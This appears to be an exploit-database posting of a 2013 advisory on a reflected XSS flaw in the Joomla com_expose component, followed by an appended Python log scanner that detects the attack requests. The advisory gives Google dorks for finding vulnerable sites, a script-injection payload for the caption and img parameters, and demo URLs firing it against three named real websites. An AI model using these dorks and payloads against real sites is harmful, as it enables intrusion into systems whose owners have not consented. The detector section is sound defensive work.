0day.today - Biggest Exploit Database in the World.
Joomla Component com_expose XSS Vulnerability
================================================
Joomla Component com_expose Critical XSS Vulnerability
================================================

+++++++++++++++++
++ C L O U D X ++
+++++++++++++++++

##############################################################
# Exploit Title: Joomla com_expose Critical XSS Vulnerability
# Author: Cloudx
# Date : 12/7/2013
# Facebook Profile: www.fb.com/cloudmrx
# FaceBook Page : www.fb.com/TIFA.T3am
# Email : mr.x.hack[at]live[dot]com
# Category:: webapps
# Google Dork 1: inurl:"components/com_expose/showpic.html"
# Google Dork 2: inurl:"index.php?option=com_expose"
# platform : php
# Vendor: [ N / A ]
# Download : Search Here > http://extensions.joomla.org/ <
# Security Risk : Medium
# Tested on: [Windows 8 64bit ]
########

========================
1)Exploit
2)Real.Demo
3)Snapshot
========================

1)Exploit
=========
exploit : ?img=&caption="><Script>alert('Cloudx')</Script>
Ex. http://Localhost/{Path}/components/com_expose/showpic.html?img=&caption="><Script>alert('Cloudx')</Script>

2) Exploit .demo :
============
http://www.originalmusic.co.il/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E

3) Snapshot :
============
http://i.imgur.com/0RMIE7N.png

[~] P0c [~] :
============
Vuln file in : http://Localhost/{Path}/components/com_expose/showpic.html?img=&caption= <<-----|

[~] D3m0 [~] :
=============
http://www.originalmusic.co.il/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E
http://www.progressor.ca/components/com_expose/showpic.html?img=%22%3E%3Cscript%3Ealert('cloudx')%3C/script%3E
http://www.jadeco.ir/int/components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E

=================================**TIFA-Team**===============================================
##### GreetZ To : TIFA-Team > Cloudx, CityHunter, Abu-3mar, Karamzaza #####
##### MSTHTR, Dr.Black, Smail Max, hunter rim, Mr.Ghost,The Blitz #####
##### Free Palestine <3 , Free Syria <3 #####
==============================================================================================
TIFA --> T = This , I = Is , F = For , A = Allah
# Facebook Profile: www.fb.com/cloudmrx
# FaceBook Page : www.fb.com/TIFA.T3am

# 0day.today [2024-06-28] #
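
A defender-side check for the request pattern in the advisory above, added here as an example and not part of the original advisory: it scans web access logs for requests to showpic.html whose img or caption parameter decodes to markup characters. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names come from the advisory above.
SHOWPIC_SUFFIX = "/components/com_expose/showpic.html"
WATCHED_PARAMS = ("img", "caption")
# Characters the PoC needs to close the attribute and open a tag.
MARKUP = re.compile(r'[<>"]')
# Request target inside a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[0-9.]+"')

def flag_request(target):
    """Return [(param, decoded value)] for showpic.html parameters carrying markup."""
    parts = urlsplit(target)
    # Match any install prefix (e.g. /int/components/...), case-insensitively.
    if not parts.path.lower().endswith(SHOWPIC_SUFFIX):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    return [(name, value)
            for name in WATCHED_PARAMS
            for value in params.get(name, [])
            if MARKUP.search(value)]

def scan(lines):
    """Return [(client address, hits)] for every log line that trips the check."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        hits = flag_request(match.group(1)) if match else []
        if hits:
            findings.append((line.split()[0], hits))
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jul/2013:10:00:01 +0000] "GET /components/com_expose/showpic.html?img=a.jpg&caption=Holiday HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Jul/2013:10:02:13 +0000] "GET /components/com_expose/showpic.html?img=&caption=%22%3E%3CScript%3Ealert%28%27Cloudx%27%29%3C/script%3E HTTP/1.1" 200 498',
    '203.0.113.5 - - [12/Jul/2013:10:05:40 +0000] "GET /int/components/com_expose/showpic.html?img=%22%3E%3Cscript%3Ealert%28%27cloudx%27%29%3C/script%3E HTTP/1.1" 200 498',
    '192.0.2.44 - - [12/Jul/2013:10:06:02 +0000] "GET /index.php?option=com_expose&caption=%3Cb%3E HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

A caption that legitimately contains a double quote will also be flagged, so treat hits as triage input rather than confirmed attempts.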